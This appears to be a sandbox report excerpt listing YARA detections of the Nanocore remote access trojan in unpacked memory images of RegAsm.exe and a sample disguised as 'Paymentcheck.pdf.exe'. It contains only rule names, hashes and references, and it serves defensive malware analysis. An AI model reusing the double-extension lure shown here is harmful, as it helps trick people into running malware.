Source: 13.2.RegAsm.exe.69f0000.37.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.69f0000.37.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegAsm.exe.38295f0.9.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.38295f0.9.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.69b4c9f.34.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.69b4c9f.34.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.6930000.27.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.6930000.27.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.3b0ad77.15.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.3b0ad77.15.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.38295f0.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.38295f0.9.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.3b21fd6.17.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.3b21fd6.17.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.2857848.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegAsm.exe.4ff0000.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.4ff0000.19.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.37ce5cf.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.37ce5cf.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.5210000.21.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.5210000.21.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.2808190.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.2808190.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.6960000.30.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.6960000.30.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.6960000.30.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.6960000.30.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.6920000.26.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.6920000.26.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.69f0000.37.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.69f0000.37.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.6930000.27.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.6930000.27.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.6940000.28.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.6940000.28.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.5210000.21.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.5210000.21.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Paymentcheck.pdf.exe.2f60b38.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.Paymentcheck.pdf.exe.2f60b38.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Paymentcheck.pdf.exe.2f60b38.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegAsm.exe.3b13ba6.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.3b13ba6.16.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.2878134.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegAsm.exe.6980000.32.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.6980000.32.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.69be8a4.35.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.69be8a4.35.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.5214629.20.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.5214629.20.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.6980000.32.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.6980000.32.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.6940000.28.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.6940000.28.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.2857848.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.2857848.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.6030000.23.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.6030000.23.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.68e0000.25.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.68e0000.25.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.68e0000.25.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.68e0000.25.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.37c9930.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.37c9930.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.3940179.13.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.3940179.13.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.6970000.31.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.6970000.31.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.394c3ad.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.394c3ad.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Paymentcheck.pdf.exe.3aa1970.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.Paymentcheck.pdf.exe.3aa1970.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegAsm.exe.394c3ad.12.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegAsm.exe.2863ac4.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegAsm.exe.39609da.14.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegAsm.exe.3940179.13.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.939558053.0000000006030000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.939558053.0000000006030000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
